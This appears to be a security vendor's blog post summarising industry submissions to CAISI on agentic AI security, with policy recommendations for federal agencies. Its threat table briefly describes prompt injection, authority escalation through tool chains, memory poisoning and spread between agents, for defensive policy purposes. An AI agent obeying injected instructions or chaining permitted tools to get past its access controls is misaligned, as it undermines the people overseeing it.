When the US Center for AI Standards and Innovation (CAISI) asked for public input on securing agentic AI systems, the response was massive: over 500 detailed submissions from Fortune 500 companies, defense contractors, AI startups, and cybersecurity firms. The result is substantial insight into how industry views the regulatory challenges of autonomous AI agents and what they think policymakers should do about it.
In order to dig into the industry position on agentic AI security, I really nerded out a bit. I used this GitHub script so I could access all the submissions without having to go through them manually, made the necessary amendments with vibe coding using Claude Code, pulled all comments into NotebookLM, and systematically identified common challenges, gaps, and recommendations across the submissions. Maybe a bit over the top, but it means the findings from this assessment are as representative as they can be.
What emerged is an interesting conundrum: while there's remarkable agreement on what could go wrong with AI agents, there is a diversity of opinions on how to fix it. This division actually creates an opening for federal leadership to step in and establish coherent frameworks before autonomous AI becomes even more embedded in critical systems.
IMMEDIATE POLICY CONTEXT: PROJECT GLASSWING
Critical infrastructure providers are already deploying autonomous agents in mission-critical systems. Project Glasswing, a coalition of key AI stakeholders that aim to find and fix software vulnerabilities using Claude Mythos, uses agents as core orchestrators of security frameworks not as mere assistants, but as foundational infrastructure components. This operational reality means agentic AI security frameworks are not future policy considerations but immediate operational requirements for critical federal systems already in deployment.
The submissions give policymakers both validation of current concerns and specific guidance for immediate action. The window for getting ahead of this is closing as autonomous systems move from experimental tools to operational infrastructure.
Critical infrastructure is deploying AI agents faster than governance frameworks can keep up. The choice is proactive policy development now or reactive scrambling after something goes wrong.
Four Attack Vectors Everyone Agrees On
Despite all the disagreements about solutions, industry submissions show striking consensus on the core threats that make autonomous AI different from traditional software security. These risks consistently showed up across submissions from major tech companies, defense contractors, and specialized security firms.
Threat Type | How It Works | Why It Matters |
|---|---|---|
Prompt Injection Attacks | Adversaries embed malicious instructions in data that agents process, hijacking agent behavior through seemingly benign inputs like emails or web content. | Cross-domain data contamination, unauthorized system access, coordinated attacks across multiple agents. |
Authority Escalation via Tool Chains | Agents combine individually permitted actions to produce unauthorized outcomes, exploiting gaps between granular permissions and systemic impact. | Circumvention of access controls, widespread data exfiltration through legitimate tool usage. |
Persistent Memory Corruption | Attackers poison agent memory with false information that influences future decisions, creating long-term behavioral modifications. | Sustained compromise surviving restarts, systematic bias injection, difficulty detecting behavioral drift. |
Multi-Agent Contagion | Compromised agents spread malicious instructions to peer agents through shared communication channels. | Exponential attack propagation, single points of failure affecting entire systems. |
What makes these threats particularly concerning from a policy standpoint is how they can spread. Unlike traditional software bugs that usually stay contained to one system, agentic AI security failures can cascade across networks of connected agents before anyone can stop them.
The submissions consistently emphasized that these threats don't have clean parallels in traditional cybersecurity. As one analysis put it, we don't have 'decades of defensive playbooks' for systems that can rewrite their own behavior while running.
Where Current Frameworks Fall Short
In addition to the risk congruence, respondents also arrive at similar conclusions regarding the gaps in existing capabilities to mitigate these emerging risks. Organizations agree that existing cybersecurity frameworks aren't built for agentic systems, though there is variance on whether these frameworks can be fixed or need to be scrapped entirely.
What's Missing | Federal Impact | When to Fix |
|---|---|---|
Non-Human Identity Standards | Critical systems lack frameworks for authenticating autonomous AI entities, creating accountability gaps. | Immediate |
Pre-Execution Policy Enforcement | Current security controls operate after the fact—insufficient for irreversible autonomous actions. | Immediate |
Cross-Agency AI Governance | Agencies lack coordinated approaches to AI agent risk management. | Near-term |
Federal Compliance Pathways | No standardized authorization processes exist for government deployment of agentic AI. | Near-term |
Liability Frameworks | Legal frameworks haven't adapted to address liability when autonomous systems make decisions. | Long-term |
One of the major issues raised is what multiple submissions call 'deployment friction,’ the gap between security requirements and practical implementation. This creates a real barrier for adoption of agentic systems, forcing organizations to either accept unknown risks or impose manual oversight that defeats the point of automation.
The identity and accountability gap is particularly concerning. Without standardized ways to authenticate autonomous entities, organizations can't establish clear responsibility chains for agent actions, a basic requirement for accountability.
Traditional software assurance assumes you can formally verify behavior in advance. AI agents have dynamic behavior that changes through interaction, which breaks fundamental assumptions of current compliance frameworks.
What To Do About It: Five Concrete Actions
Despite the growing alignment on the challenges and gaps, there were several significant variations on the specific policy actions to bridge the current gaps. Overall, the recommendations prefer extending existing frameworks rather than building entirely new regulatory systems from scratch, but vary on which framework to prioritize, what sorts of changes should be made, and how strong a role the government should take in championing these updates. The following are the most common actions proposed by the respondents:
Get AI Identity Standards Moving
Direct NIST to fast-track development of cryptographic identity frameworks for autonomous AI entities, building on existing standards like Decentralized Identifiers and SPIFFE. Require all federal AI agents to maintain verifiable identity chains linking actions back to accountable humans.
Timeline: 6-12 months • Who does it: NIST, working with OMB and agency security teams
Require Pre-Execution Checks for Federal AI Systems
Make all government-deployed AI agents implement policy enforcement that validates intended actions before they execute. Establish mandatory kill-switches and rollback capabilities for high-stakes operations.
Timeline: 12-18 months • Who does it: OMB sets the rules, agencies implement them
Build AI Security-Specific Security Guidelines
Task NIST to amend/append SP 800-53 and the secure software development framework (SSDF) covering AI-specific security requirements, such as dynamic tool authorization, persistent memory governance, and multi-agent communication. Fast-track the proposed NISTIR 8605D.
Timeline: 12-24 months • Who does it: NIST, with input from CISA and agency security teams
Create an Authorization Process for Agentic AI Systems
Build standardized security authorization processes specifically designed for government deployment of agentic AI systems. Address the unique characteristics of non-deterministic systems that traditional authorization processes can't handle, as well as the scale of agents to be deployed within the Federal enterprise.
Timeline: 18-24 months • Who does it: GSA FedRAMP office, working with agency authorizing officials and NIST
Set Up AI Threat Intelligence Sharing
Create a dedicated information sharing center for AI-specific threats, incident reports, and defensive techniques. Require agencies deploying agentic systems in critical functions to participate.
Timeline: 12-18 months • Who does it: DHS CISA, coordinated through NSC
These actions represent the minimum needed to address immediate deployment needs while building a foundation for longer-term governance. Each builds on existing institutional capabilities rather than requiring entirely new bureaucratic structures.
Three Things to Keep in Mind for Implementation
The submissions revealed three critical factors that should guide federal policy on agentic AI security:
First, the timing pressure is real. Multiple government initiatives, including Project Glasswing, are already using autonomous agents as core system components. Delaying policy development risks creating the same reactive regulatory mess that has characterized internet security governance.
Second, the fragmentation risk is serious. Industry submissions document competing and incompatible standards being developed simultaneously across multiple organizations. Without federal coordination, this fragmentation will create integration barriers that undermine universal accountability.
Third, the compliance pathway has to be practical. The most frequently cited barrier to government AI adoption is the gap between existing authorization processes and the non-deterministic characteristics of AI systems. Closing this gap through adapted rather than entirely new frameworks is the fastest path to secure deployment.
The industry has provided clear consensus on risks and has proposed a laundry list of actionable recommendations for solutions. What's missing is federal will to implement coordinated policy action before the governance window closes.
Bottom Line: Act Now or React Later
The industry response to the CAISI RFI provides policymakers with both validation and direction. The consensus on risks is clear, the gaps in current frameworks are documented, and the path forward through extending existing regulatory structures is increasingly defined.
What comes through most clearly is the urgency of the timeline. Critical infrastructure and government agencies are already deploying autonomous AI systems as foundational infrastructure components. The choice facing policymakers is between proactive governance that shapes this deployment or reactive regulation that responds to incidents after they happen.
The submissions show that industry is ready to work within expanded federal frameworks; many explicitly call for federal leadership to resolve coordination problems that markets can't address on their own. The policy infrastructure exists, the implementation pathways are clear, and the window for action is still open.
Autonomous AI systems are already central to government operations. It’s time for federal policy frameworks to govern it securely and accountably.
All ArticlesRelated blog posts
Build for Tomorrow, Today: Deploying Agentic AI Under EU and UK Regulations
Organisations deploying agents face a challenge: the predominant AI frameworks most organisations rely on do not...
Why Soft Guardrails Get Us Hacked: The Case for Hard Boundaries in Agentic AI
One recurring theme in my research and writing on agentic AI security has been the distinction between soft guardrails...
AI Agent Governance: The CISO Checklist for the New AI Agent Reality
AI Agent Governance Is Now a CISO-Level Priority AI agents are rapidly becoming embedded in enterprise workflows,...
Secure Your Agents
We’d love to chat with you about how your team can secure and govern AI Agents everywhere.
Get a Demo